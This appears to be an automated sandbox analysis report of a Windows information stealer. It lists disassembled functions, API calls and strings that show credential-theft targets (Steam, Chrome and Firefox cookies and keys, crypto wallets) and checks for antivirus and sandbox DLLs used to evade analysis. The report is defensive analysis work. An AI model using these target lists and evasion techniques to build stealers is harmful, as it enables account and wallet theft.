                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: strlen$Desktopmemcpy$??3@CreateOpen
                                                                                                                                                                                                                                                                          • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA$_CreateProcess$cookies
                                                                                                                                                                                                                                                                          • API String ID: 3209976073-957743217
                                                                                                                                                                                                                                                                          • Opcode ID: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                          • Instruction ID: 88d1e3b40fbcb0df37290dc8620aa57b8ac853b7570111a731a950e539c68a8a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F1F431D046049BDB11EF64CD81BEEB7B0AF45304F00456EF90677292EB79A9C5CB9A
                                                                                                                                                                                                                                                                          Function 00414BD0 Relevance: 37.3, APIs: 9, Strings: 12, Instructions: 553stringfileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2497 414bd0-414c0b FindFirstFileA 2499 414c11-414c2c 2497->2499 2500 414fa2-414fcb call 410230 * 4 2497->2500 2502 414c6a-414ca0 call 402400 2499->2502 2507 414cc0 2502->2507 2508 414ca2-414cb3 strlen 2502->2508 2510 414cc2-414cd1 2507->2510 2508->2510 2512 414d10-414d14 2510->2512 2513 414cd3-414cda 2510->2513 2515 414e05-414e0e 2512->2515 2516 414d1a-414d4e call 402400 2512->2516 2517 414ce2-414cf5 memcmp 2513->2517 2518 414cdc 2513->2518 2521 414e10-414e22 2515->2521 2522 414e56-414e58 2515->2522 2531 414d50-414d61 strlen 2516->2531 2532 414d63 2516->2532 2517->2516 2523 414cf7-414cf9 2517->2523 2518->2517 2526 414e24-414e26 2521->2526 2527 414e4d-414e53 ??3@YAXPAX@Z 2521->2527 2528 414c52-414c64 2522->2528 2529 414e5e-414eeb call 411250 * 2 call 4101c0 call 4076b0 2522->2529 2523->2516 2530 414cfb-414cfd 2523->2530 2533 414e2c-414e31 2526->2533 2534 414fce-415077 _invalid_parameter_noinfo_noreturn RegOpenKeyExA 2526->2534 2527->2522 2528->2502 2545 414f88-414f9d call 411250 2528->2545 2588 414ef1-414f83 call 4101c0 call 410200 * 4 call 413e50 call 410230 2529->2588 2589 414c30-414c4d call 411250 * 2 2529->2589 2530->2515 2536 414d03 2530->2536 2538 414d65-414d74 2531->2538 2532->2538 2533->2534 2539 414e37-414e3c 2533->2539 2542 415096-415210 call 411250 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 2534->2542 2543 415079-41508d 2534->2543 2536->2516 2546 414da0-414da7 2538->2546 2547 414d76-414d83 2538->2547 2539->2534 2548 414e42-414e45 2539->2548 2627 415215-415390 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 call 410200 * 4 call 414bd0 call 411250 call 410230 * 4 2542->2627 2543->2542 2545->2500 2553 414da9-414dac 2546->2553 2554 414daf-414dbd 2546->2554 2550 414d85 2547->2550 2551 414d8b-414d9e memcmp 2547->2551 2548->2534 2552 414e4b 2548->2552 2550->2551 2551->2546 2551->2554 2552->2527 2553->2554 2554->2515 2557 414dbf-414dd1 2554->2557 2561 414dd3-414dd5 2557->2561 2562 414dfc-414e02 ??3@YAXPAX@Z 2557->2562 2561->2534 2564 414ddb-414de0 2561->2564 2562->2515 2564->2534 2565 414de6-414deb 2564->2565 2565->2534 2567 414df1-414df4 2565->2567 2567->2534 2569 414dfa 2567->2569 2569->2562 2588->2589 2589->2528
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                            • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 00414DFD
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memcmpstrlen$??3@FileFindFirstmemmove
                                                                                                                                                                                                                                                                          • String ID: %s\%s$DialogConfig.vdf$DialogConfigOverlay*.vdf$Soft$Software\Valve\Steam$SteamPath$\Steam\$\config\$config.vdf$libraryfolders.vdf$loginusers.vdf$ssfn*
                                                                                                                                                                                                                                                                          • API String ID: 3586713249-3432709174
                                                                                                                                                                                                                                                                          • Opcode ID: e8913cc1306ead9757348380cdc05cbb35dee01de83e02b5b92843a6cff9921b
                                                                                                                                                                                                                                                                          • Instruction ID: f04b4360dc0817d558250c3cdd1667f1ca9511f4c4837c2270bb77207d21b6f3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8913cc1306ead9757348380cdc05cbb35dee01de83e02b5b92843a6cff9921b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1132B531C007589BDF10EF65CD85AEDB778BF58304F00929AF90967152EB78AAC5CB94
                                                                                                                                                                                                                                                                          Function 0040A5D0 Relevance: 32.0, APIs: 7, Strings: 11, Instructions: 509filestringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,?,?,0042150A), ref: 0040A63D
                                                                                                                                                                                                                                                                            • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040A738
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileFindFirstmemmovestrlen
                                                                                                                                                                                                                                                                          • String ID: C:\ProgramData\$CURRENT$IndexedDB$Local Extension Settings$Opera$Plugins$Sync Extension Settings$Wallets$\*.*$_0.indexeddb.leveldb$chrome-extension_
                                                                                                                                                                                                                                                                          • API String ID: 600402033-450108884
                                                                                                                                                                                                                                                                          • Opcode ID: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                          • Instruction ID: 1a3cb996083095315d2ff66196e58a8cf7e0966e26cbd8d21691459e5d96898c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 841243316102589BCB14EBA1CD95AEE7779AF54308F40009EF5066B182DFBC6EC5CBA9
                                                                                                                                                                                                                                                                          Function 004170D0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 117stringfileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 3773 4170d0-4170f8 SHGetFolderPathA 3774 417264-41726e 3773->3774 3775 4170fe-417124 wsprintfA FindFirstFileA 3773->3775 3775->3774 3776 41712a-417139 3775->3776 3777 417159-41715f 3776->3777 3778 417161-417174 3777->3778 3779 41714d-417153 FindNextFileA 3777->3779 3778->3779 3781 417176-417189 strcpy 3778->3781 3779->3777 3780 41725d-41725e FindClose 3779->3780 3780->3774 3782 4171b0-4171c1 strlen 3781->3782 3783 41718b-4171ad _splitpath strcpy 3781->3783 3784 417140-417146 3782->3784 3785 4171c7-4171c9 3782->3785 3783->3782 3784->3779 3786 4171d0-4171e3 isupper 3785->3786 3786->3784 3787 4171e9-4171ec 3786->3787 3787->3786 3788 4171ee-417258 wsprintfA strcpy strlen SHFileOperationA 3787->3788 3788->3784
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileFindstrcpy$strlenwsprintf$CloseFirstFolderNextOperationPath_splitpathisupper
                                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\*$.
                                                                                                                                                                                                                                                                          • API String ID: 3519957579-2663966076
                                                                                                                                                                                                                                                                          • Opcode ID: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                          • Instruction ID: 114bed65e9d4b9d73eb4094e4860af952423d6fe10318c0fdbdbb5acdc2bd80f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8413B71908348AFD2209B21DC05BEB77BCAFD5304F04452EF99982251E779A689C7AB
                                                                                                                                                                                                                                                                          Function 0040C790 Relevance: 26.9, APIs: 11, Strings: 4, Instructions: 614stringfileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 3789 40c790-40c813 call 4101c0 call 4102e0 call 410340 call 410290 call 410230 * 2 call 410530 FindFirstFileA 3804 40cda2-40cde6 call 410230 * 8 3789->3804 3805 40c819-40c831 3789->3805 3837 40cde9-40ceca _invalid_parameter_noinfo_noreturn call 4101c0 * 2 call 411550 call 4102e0 call 410290 call 410230 * 2 call 4102e0 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 * 2 call 410290 call 410230 * 2 call 410200 call 411520 3804->3837 3807 40c860-40c88a call 402400 3805->3807 3812 40c8a0 3807->3812 3813 40c88c-40c89d strlen 3807->3813 3815 40c8a2-40c8ae 3812->3815 3813->3815 3817 40c8e0-40c8e4 3815->3817 3818 40c8b0-40c8b4 3815->3818 3822 40c9b6-40c9bf 3817->3822 3823 40c8ea-40c914 call 402400 3817->3823 3820 40c8b6 3818->3820 3821 40c8b9-40c8cc memcmp 3818->3821 3820->3821 3821->3823 3825 40c8ce-40c8d0 3821->3825 3828 40c9c1-40c9d0 3822->3828 3829 40ca04-40ca0c 3822->3829 3842 40c916-40c927 strlen 3823->3842 3843 40c929 3823->3843 3825->3823 3834 40c8d2-40c8d4 3825->3834 3830 40c9d2-40c9d4 3828->3830 3831 40c9fb-40ca01 ??3@YAXPAX@Z 3828->3831 3832 40ca12-40ca8d call 4101c0 call 4102e0 call 410340 * 2 call 410290 call 410230 * 3 3829->3832 3833 40c848-40c85a FindNextFileA 3829->3833 3830->3837 3838 40c9da-40c9df 3830->3838 3831->3829 3903 40caa1-40cb42 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 3832->3903 3904 40ca8f-40ca96 3832->3904 3833->3807 3841 40cd96-40cd9f 3833->3841 3834->3822 3840 40c8da 3834->3840 3971 40ced0-40ced9 3837->3971 3972 40d02d-40d075 call 410230 * 8 3837->3972 3838->3837 3847 40c9e5-40c9ea 3838->3847 3840->3823 3841->3804 3845 40c92b-40c937 3842->3845 3843->3845 3850 40c957-40c95e 3845->3850 3851 40c939-40c93d 3845->3851 3847->3837 3853 40c9f0-40c9f3 3847->3853 3861 40c960-40c963 3850->3861 3862 40c966-40c971 3850->3862 3857 40c942-40c955 memcmp 3851->3857 3858 40c93f 3851->3858 3853->3837 3860 40c9f9 3853->3860 3857->3850 3857->3862 3858->3857 3860->3831 3861->3862 3862->3822 3866 40c973-40c982 3862->3866 3870 40c984-40c986 3866->3870 3871 40c9ad-40c9b3 ??3@YAXPAX@Z 3866->3871 3870->3837 3875 40c98c-40c991 3870->3875 3871->3822 3875->3837 3878 40c997-40c99c 3875->3878 3878->3837 3882 40c9a2-40c9a5 3878->3882 3882->3837 3886 40c9ab 3882->3886 3886->3871 3985 40cb50-40cb5f call 410530 CopyFileA 3903->3985 3906 40c840-40c843 call 410230 3904->3906 3907 40ca9c 3904->3907 3906->3833 3911 40ccc5-40cd89 call 410200 * 2 call 4101c0 call 410200 * 4 call 40c790 3907->3911 3958 40cd8e-40cd91 3911->3958 3958->3906 3974 40cfa4-40d026 call 410200 * 2 call 4101c0 call 410200 * 4 call 409460 3971->3974 3975 40cedf-40cf9a call 410200 * 2 call 4101c0 call 410200 * 4 call 40c790 3971->3975 4053 40d02b 3974->4053 4052 40cf9f 3975->4052 3997 40cb61-40cb86 call 410200 call 411d20 call 410530 3985->3997 3998 40cb88-40cb92 3985->3998 3997->3985 3999 40cb98-40cb9f 3998->3999 4000 40cc8e-40cca3 call 410530 DeleteFileA call 4104e0 3998->4000 4005 40cba0-40cc73 call 410200 * 10 call 40c530 3999->4005 4026 40cca8-40ccbf call 410230 4000->4026 4067 40cc78-40cc88 4005->4067 4026->3906 4026->3911 4052->4053 4053->3972 4067->4000 4067->4005
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 0040C80A
                                                                                                                                                                                                                                                                            • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040C893
                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040C8C2
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040C91D
                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C94B
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C9AE
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memcmpstrlen$??3@FileFindFirstmemmove
                                                                                                                                                                                                                                                                          • String ID: C:\ProgramData\$\..\$prefs.js$profiles.ini
                                                                                                                                                                                                                                                                          • API String ID: 3586713249-2608480989
                                                                                                                                                                                                                                                                          • Opcode ID: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                          • Instruction ID: 416ba331a07f3905739cc071a47e34269f16b80876d8e7813359335a266a51ee
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4932D7319002189BCB14EBB1C9D5AEEB778BF48304F40455EF41667192DF7CAAC9CBA9
                                                                                                                                                                                                                                                                          Function 004011F0 Relevance: 25.6, APIs: 6, Strings: 11, Instructions: 110stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,avghookx.dll,?,?,?,004185FC), ref: 0040121E
                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,avghooka.dll,?,?,?,004185FC), ref: 0040124E
                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,snxhk.dll,?,?,?,004185FC), ref: 0040127E
                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,sbiedll.dll,?,?,?,004185FC), ref: 004012AE
                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,api_log.dll,?,?,?,004185FC), ref: 004012DE
                                                                                                                                                                                                                                                                            • Part of subcall function 004011B0: lstrcmpiW.KERNEL32(?,?,7591F360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,dir_watch.dll,?,?,?,004185FC), ref: 0040130E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                                                                                                          • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                                                                                                                                                                                                          • API String ID: 1586166983-3272603366
                                                                                                                                                                                                                                                                          • Opcode ID: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                          • Instruction ID: 41c0b1b83a52b27a2bdfeff9d3ed397a321de4e9cb8fcf5d4a551c39b82ef4d0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D431AD323413509BCB119B05C8C0F253362AF99B98FAE01F6E902BB7B7D27C9C41865D
                                                                                                                                                                                                                                                                          Function 00401730 Relevance: 23.7, APIs: 8, Strings: 5, Instructions: 968filestringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,00000028,00000028,00000028,P#@,?,00420BBE,?,?,?,00420BBE,P#@,?,00000028,00000028,?), ref: 004018D4
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00401970
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileFindFirststrlen
                                                                                                                                                                                                                                                                          • String ID: C:\ProgramData\$P#@$P#@$Wallets$\*.*
                                                                                                                                                                                                                                                                          • API String ID: 3775335128-2645412951
                                                                                                                                                                                                                                                                          • Opcode ID: 0392e0cbbb74c3f63e79c827141e62e095c897f05b3910d11131e3b73294b9ba
                                                                                                                                                                                                                                                                          • Instruction ID: f6b8f89bdbb38ad25dbe9b200cedc7393f8838c2c48d913623183ff2efa6fcc7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0392e0cbbb74c3f63e79c827141e62e095c897f05b3910d11131e3b73294b9ba
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C572B931A102185BCF14EBA1CD959EEB779AF44304F40409EF9066B192DF7CAEC5CBA9
                                                                                                                                                                                                                                                                          Function 00409460 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 341filestringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 004094C5
                                                                                                                                                                                                                                                                            • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000006,?,00420BBE,?,?,?,C:\ProgramData\,0042150A,?), ref: 004095D2
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00409766
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$AllocCopyCreateFindFirstLocalReadlstrlenstrlen
                                                                                                                                                                                                                                                                          • String ID: C:\ProgramData\$\key4.db$cookies.sqlite
                                                                                                                                                                                                                                                                          • API String ID: 1682363559-1530792146
                                                                                                                                                                                                                                                                          • Opcode ID: efc8b8d459f8125ef32f95508c9d4e357bcd32b5b3231743abb90690a61e27b0
                                                                                                                                                                                                                                                                          • Instruction ID: 855358d25c22b69566fbc42c17e74533ab55524d0b71b666bfbe4b79f85c7bd2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efc8b8d459f8125ef32f95508c9d4e357bcd32b5b3231743abb90690a61e27b0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CC1B631A102189BCF14EBB1CC95AEE7779AF44304F44005EF80667292DB7C6EC5CBA9
                                                                                                                                                                                                                                                                          Function 004078F0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 264stringencryptionCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                            • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32 ref: 00407AFA
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00407BC2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocFileLocallstrlen$CreateCryptDataReadUnprotect
                                                                                                                                                                                                                                                                          • String ID: "encrypted_key":"$AES$ChainingMode$ChainingModeGCM$DPAP$_key.txt
                                                                                                                                                                                                                                                                          • API String ID: 2245422391-530840575
                                                                                                                                                                                                                                                                          • Opcode ID: 80c8c99dc66d1a3a314694ca8b656682875a6de58e5a181b00e7ea29ddd83769
                                                                                                                                                                                                                                                                          • Instruction ID: 10bc9677902d6ee6c816a36e6349628b10f5ac32de00f2ba7c41a4f543123621
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80c8c99dc66d1a3a314694ca8b656682875a6de58e5a181b00e7ea29ddd83769
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93A1C571E042159BDB10DFA1CC85BAE7BB5FF44304F10452AE901BB291D778BA45CBA6
                                                                                                                                                                                                                                                                          Function 00404280 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 173networkfileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                            • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?,?,?,00416A04,?,?,00416A04), ref: 004028FA
